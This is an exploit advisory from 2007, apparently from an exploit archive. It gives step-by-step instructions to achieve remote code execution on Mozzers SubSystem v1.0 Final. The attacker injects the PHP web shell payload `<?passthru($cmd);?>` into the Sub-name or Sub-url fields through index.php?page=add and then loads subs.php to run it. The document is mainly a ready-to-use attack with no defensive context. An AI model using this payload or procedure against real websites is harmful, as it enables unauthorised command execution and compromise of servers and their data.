[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Mozzers SubSystem final (subs.php) Remote Code Execution Vulnerability
# Published : 2007-04-18
# Author : Dj7xpl
# Previous Title : jGallery 1.3 (index.php) Remote File Inclusion Vulnerability
# Next Title : AimStats 3.2 (process.php update) Remote Code Execution Exploit
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+ +
+ Y! Underground Group +
+ +
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+ +
+ Portal......: Mozzers SubSystem v1.0 Final +
+ Author......: Dj7xpl / Dj7xpl@Yahoo.com +
+ Type........: Remote Code Execution Vulnerability +
+ Download....: http://sourceforge.net/projects/subsystem/ +
+ Page........: http://Dj7xpl.2600.ir +
+ +
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+ +
+ Bug.........: +
+ (1) Open Target By Browser : http://[Target]/[Path]/index.php?page=add +
+ (2) Insert Bad Code Into (Sub-name) Or (Sub-url) E.g :<?passthru($cmd);?> +
+ (3) See Your Bad Code : http://[Target]/[Path]/subs.php +
+ +
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# www.Syue.com [2007-04-18]